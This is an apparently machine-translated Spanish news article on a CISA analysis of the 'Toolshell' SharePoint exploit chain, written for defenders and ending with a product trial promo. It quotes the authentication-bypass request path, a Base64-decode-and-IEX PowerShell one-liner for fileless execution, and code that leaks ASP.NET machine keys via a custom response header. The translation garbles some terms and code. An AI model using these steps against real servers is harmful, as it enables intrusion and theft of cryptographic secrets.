La Agencia de Seguridad de Ciberseguridad e Infraestructura de EE. UU. (CISA) publicó un análisis urgente a principios de julio de 2025, que detalla una sofisticada cadena de exploit dirigida a los servidores de Microsoft SharePoint de Microsoft.
Apodado “Toolshell”, la campaña aprovecha dos nuevas vulnerabilidades: CVE-2025-49706, una falla de falsificación de la red y CVE-2025-49704, una debilidad de ejecución de código remoto) para obtener acceso no autorizado e instalar webshells sigilosos.
El compromiso inicial comienza con una solicitud diseñada a la interfaz de edición de SharePoint, invocando /_layouts/15/toolpane.aspx?displaymode=Edit, que omite las verificaciones de autenticación e instala una carga útil ASPX maliciosa.
Analistas de CISA anotado Que una vez que el atacante gana el acceso de la carcasa, encadena un extractor de llave de máquina basado en DLL, codificado como base64, para cosechar secretos criptográficos de la configuración ASP.NET.
Las teclas extraídas se exfiltran inyectando un encabezado HTTP personalizado llamado X-Txt-Net en cada respuesta, facilitando el descifrado remoto de los valores de ViewState y Cookie protegidos.
Las firmas de detección incorporan el encabezado único y los hashes DLL asociados, lo que permite una rápida identificación de infecciones finales.
Según los investigadores de CISA, la etapa final implementa una WebShell (info3.aspx) multifunción que admite la ejecución de comandos interactivos, las cargas de archivos y la recolección de credenciales a través de un formulario de inicio de sesión de respuesta a la respuesta.
Los atacantes presentan comandos de PowerShell a través de cuerdas codificadas en Base64:-
$ encoded = “jabiaGeAcwbladyanabtahq …” (System.Text.Encoding) :: UTF8.GetString ((System.Convert) :: FromBase64String ($ encoded)) | IEX
Este fragmento decodifica la carga útil y la ejecuta en la memoria, dejando huellas forenses mínimas. El resultado es un punto de apoyo persistente que evade la detección de AV simple al evitar las escrituras de disco.
El mecanismo de infección de Toolshell depende de abusar de las características de personalización de SharePoint.
El atacante envía una solicitud de publicación a SpinStall0.aspx, lo que hace que el servidor escriba Info3.aspx en el directorio plantilla \ diseños. Una vez implementado, info3.aspx decodifica otra base64 dll (bjcloiyq.dll) para recuperar los parámetros de clave de la máquina:-
VAR Sección = (MachineKeySection) WebConfigurationManager.getSection (“System. Web/MachineKey”); var headervalue = $ “{section.ValidationKey} | {section.DecryptionKey}”; Respuesta.headers.add (“x-txt-net”, Headervalue);
Este código, extraído a través de la reflexión, exfiltra los secretos que los atacantes luego aprovechan por completo las cookies válidas de SharePoint y omitieron la autenticación por completo.
La persistencia se garantiza encadenando conchas ASPX adicionales (SpinStallb.aspx y SpinStallp.aspx) que implementan el descifrado de carga útil basada en XOR y la reiniciando para el comando y el control.
El monitoreo continuo de la lista del COI divulgada, que incluye nombres de archivo ASPX, DLL SHA-256 Hashes y el encabezado X-TXT-NET, es crucial para los defensores para detectar e interrumpir las operaciones sigilosas de herramientas.
Equipe su SOC con el acceso completo a los últimos datos de amenazas de cualquiera. Obtenga una prueba gratuita de 14 días
